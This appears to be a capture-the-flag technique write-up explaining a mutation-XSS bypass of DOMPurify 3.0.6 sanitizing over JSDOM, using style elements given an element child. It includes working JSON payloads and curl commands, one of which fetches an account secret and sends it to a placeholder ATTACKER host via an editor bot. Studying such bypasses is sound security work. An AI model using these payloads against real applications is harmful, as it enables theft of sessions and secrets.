pwneglyph logo
web javascript mxss dompurify jsdom xss parser-differential rawtext

Exploit the parser mismatch between server-side DOMPurify/JSDOM sanitization and browser reparsing of the serialized string.

mXSS through DOMPurify + JSDOM Reparse of a "Safe" Tree

DOMPurify only guarantees that the DOM node tree it returns is safe — it does not guarantee that the string you get back from that tree is safe to feed to an HTML parser again. When sanitization happens server-side over JSDOM and the resulting string is later dropped into innerHTML in a real browser, two different HTML engines touch the same bytes: JSDOM serializes, Chromium re-parses. mXSS lives in that gap.

The trick relies on rawtext elements (style, script, textarea, title, xmp, noscript, iframe, noframes…). Per the HTML serialization spec, the text content of a rawtext element is emitted literally, without escaping — a </style> inside a <style> text node comes out as the raw bytes </style>, not &lt;/style&gt;. To JSDOM that is inert character data nested in a node. To Chromium re-parsing the string, that </style> closes the element early and everything after it becomes live markup.

Why It Works

  • "Sanitized HTML string" is not a parser-independent concept. A tree that is provably safe inside JSDOM can re-materialize as active markup once a different parser reads its serialization.

  • DOMPurify's intended safe usage keeps everything as nodes (RETURN_DOM_FRAGMENT + replaceChildren) so the string is never re-parsed. The bug appears when the app serializes to a string and re-parses:

    // SAFE: node never re-parsed
    const frag = DOMPurify.sanitize(dirty, { RETURN_DOM_FRAGMENT: true });
    post.replaceChildren(frag);
    
    // VULNERABLE: string is re-parsed by the browser
    post.innerHTML = DOMPurify.sanitize(dirty);
    

    This is forced on you when sanitization is server-side (JSDOM) and insertion is client-side: you cannot ship a live JSDOM node across the wire, only its serialized string.

Vulnerable Pattern

Server sanitizes with DOMPurify over JSDOM and returns the serialized string; the client re-parses it. From the Inkpress challenge (server.js):

const createDOMPurify = require('dompurify');   // 3.0.6 — pre-3.1 anti-mXSS gate
const { JSDOM } = require('jsdom');

function renderDocument(tree) {
  const window = new JSDOM('').window;
  const document = window.document;
  const DOMPurify = createDOMPurify(window);
  const root = document.createElement('article');
  for (const node of nodes) root.appendChild(buildNode(document, node, 0));
  return DOMPurify.sanitize(root);          // returns a STRING (root.innerHTML)
}
// /p/:id page sent to the editor bot — the sanitized string is re-parsed here
const data = ${data};                       // { title, html }
document.getElementById('post').innerHTML = data.html;   // <-- reparse sink

Crucially the app lets you build the node tree by hand via a JSON tree of { tag, attrs, children } blocks (buildNode), so you control the exact node shape DOMPurify sees — including giving a rawtext element an element child:

function buildNode(document, spec, depth) {
  if (typeof spec.text === 'string') return document.createTextNode(spec.text);
  const tag = String(spec.tag || '').toLowerCase();
  if (!/^[a-z][a-z0-9]*$/.test(tag)) throw new Error('invalid tag name');
  const el = document.createElement(tag);
  // ...attrs...
  if (Array.isArray(spec.children))
    for (const child of spec.children) el.appendChild(buildNode(document, child, depth + 1));
  return el;
}

The DOMPurify Anti-mXSS Gate (and how to skip it)

DOMPurify ≤ 3.0.x has one defense against exactly this. In _sanitizeElements it force-removes a node whose children are text only but whose text looks like markup:

// purify.cjs.js (DOMPurify 3.0.6)
if (currentNode.hasChildNodes()
    && !_isNode(currentNode.firstElementChild)              // no ELEMENT child
    && regExpTest(/<[/\w]/g, currentNode.innerHTML)
    && regExpTest(/<[/\w]/g, currentNode.textContent)) {
  _forceRemove(currentNode);                                // <style>...</style> killed
}

A <style> whose only child is the breakout text is removed. But the gate is short-circuited the moment the element has an element child: firstElementChild becomes non-null, so !_isNode(currentNode.firstElementChild) is false and the whole condition fails. So:

  • Give <style> a harmless surviving element child (<br>) → gate skipped, <style> survives.
  • Give <style> a text node carrying </style><img ... onerror=...>. DOMPurify (default config, SAFE_FOR_TEMPLATES unset) never treats text inside a rawtext element as markup, so onerror is never stripped.

This element-child bypass is patched in DOMPurify 3.1+.

Exploit Flow

  1. Confirm the sink is "sanitize server-side over JSDOM → serialize → browser re-parses via innerHTML".
  2. Pick a rawtext element you're allowed to emit (style here).
  3. Give it two children: a benign element child to defeat the anti-mXSS gate, and a text child that closes the rawtext element and injects live markup.
  4. Trigger the page in the victim's browser (here: request an editorial review so the bot opens /p/:id).
  5. In onerror, do the real work — exfiltrate the secret the bot can read.

What DOMPurify sees vs. what the browser sees

DOMPurify walks this tree and considers it clean (text is opaque inside style):

article
└─ style
   ├─ #text  "</style><img src=1 onerror=alert(1)>"   ← opaque chars to JSDOM
   └─ br                                                ← makes firstElementChild non-null

JSDOM serializes the text node literally (rawtext rule), producing:

<article><style></style><img src=1 onerror=alert(1)><br></style></article>

Chromium re-parses that string: the first </style> closes the style early, and <img> becomes a real, live element — onerror fires.

Final Payload

The JSON tree submitted to /api/posts:

[
  {
    "tag": "style",
    "children": [
      { "text": "</style><img src=1 onerror=alert(1)>" },
      { "tag": "br" }
    ]
  }
]

Weaponized for the challenge — the editor bot carries an httpOnly session cookie and the flag is served from /api/account ({ role, name, secret: FLAG }). Keep the onerror value space-free so it stays a single unquoted attribute after reparse:

[
  {
    "tag": "style",
    "children": [
      { "text": "</style><img src=1 onerror=fetch('/api/account').then(r=>r.text()).then(s=>location='https://ATTACKER/?'+encodeURIComponent(s))>" },
      { "tag": "br" }
    ]
  }
]

Then publish and request a review so the bot renders it:

# publish, capture the id
ID=$(curl -s http://TARGET/api/posts -H 'Content-Type: application/json' \
  -d '{"title":"x","tree":[{"tag":"style","children":[{"text":"</style><img src=1 onerror=fetch(`/api/account`).then(r=>r.text()).then(s=>location=`https://ATTACKER/?`+encodeURIComponent(s))>"},{"tag":"br"}]}]}' \
  | python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])')

# make the editor bot open it (DWELL gives the XSS time to fire)
curl -s http://TARGET/api/review -H 'Content-Type: application/json' -d "{\"id\":\"$ID\"}"

Variations

  • Other rawtext elements: textarea, title, xmp, noscript, iframe, noframes. Same idea — literal serialization of inner text + an element child to dodge the gate.
  • Comment-boundary mXSS (<style><!--</style>...) and noscript/template quirks are related classes when no element-child gate is in play.
  • If only attribute values serialize, remember they escape only quotes/&< and > survive, so value="</style>"-style breakouts apply.

Common Blockers

  • DOMPurify 3.1+ closes the firstElementChild gate; on patched versions look for a different serialization divergence or a different sanitizer entirely.
  • If both sides use the same engine, or the output is inserted as text (textContent) rather than re-parsed, there is no gap to exploit.
  • A space inside an unquoted onerror after reparse splits the attribute — quote it or keep it space-free.

Good Situations To Use It

  • Sanitization happens server-side over JSDOM, then the string is re-inserted via innerHTML in a browser.
  • You control the node tree precisely (e.g. a JSON block builder) and rawtext elements are allowed.
  • A privileged headless bot opens your content and holds a secret/cookie worth stealing.

Sources